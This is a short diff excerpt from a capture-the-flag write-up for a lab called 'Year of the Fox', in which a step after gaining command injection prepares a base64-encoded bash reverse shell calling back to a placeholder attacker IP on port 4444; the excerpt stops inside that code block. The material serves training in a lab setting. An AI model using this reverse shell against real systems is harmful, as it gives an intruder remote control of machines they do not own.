Luki1235512/CTF-write-ups/write-ups/Year of the Fox/README.md

 ### What is the user flag?

-1. Now that we have command injection, let's establish a connection.
+1. With command injection, let's establish a connection.
 Prepare a base64-encoded reverse shell payload

 ```bash
 echo -n "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1" | base64